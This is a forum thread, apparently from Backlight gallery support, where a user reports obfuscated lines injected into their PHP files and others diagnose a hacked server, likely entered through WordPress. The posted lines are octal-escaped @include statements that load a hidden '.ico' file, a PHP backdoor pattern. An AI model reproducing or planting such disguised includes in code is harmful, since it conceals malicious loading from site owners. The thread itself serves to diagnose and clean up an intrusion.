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I get lines like this inserted into my xxx files in the gallery directories.
/*cb7c0*
@include "\057var/\163ervi\143es/w\145b/ba\143klig\150t/mo\144ules\057pang\157lin-\141lbum\055set/\056ebb8\145421.\151co";
/*cb7c0*/
/*59676*/
@include "\057va\162/s\145rv\151ce\163/w\145b/\142ac\153li\147ht\057mo\144ul\145s/\160an\147ol\151n-\141lb\165m-\163et\057.e\142b8\14542\061.i\143o";
/*59676*/
What is it that can cause this.
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What specifically are “xxx” files?
Are these in albums? Sets?
Can you post a link?
Rod
Just a user with way too much time on his hands.
www.rodbarbee.com
ttg-tips.com, Backlight 2/3 test site
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I’m sorry to say but it looks like your server has been hacked and what’s in your PHP files is malicious code.
Do you run WordPress on your server?
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index.psp.
I use wordpress
Last edited by Kristinn@hotmail.no (2019-12-22 17:44:40)
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I use mcACfee as vel
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Backlight is too small a thing to be targeted by hackers, and Ben happens to be very good at securing our back end. Likely Wordpress was the point of entry; Wordpress is one of the hottest targets for hacking, as prevalent as it is. You’d do well to ensure you’re up-to-date with the latest version of WP and whatever plugins you’re using, and you should look into some security focused plugins, such as Wordfence.
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I use mcACfee as vel
McAfee protects your computer, not your website.
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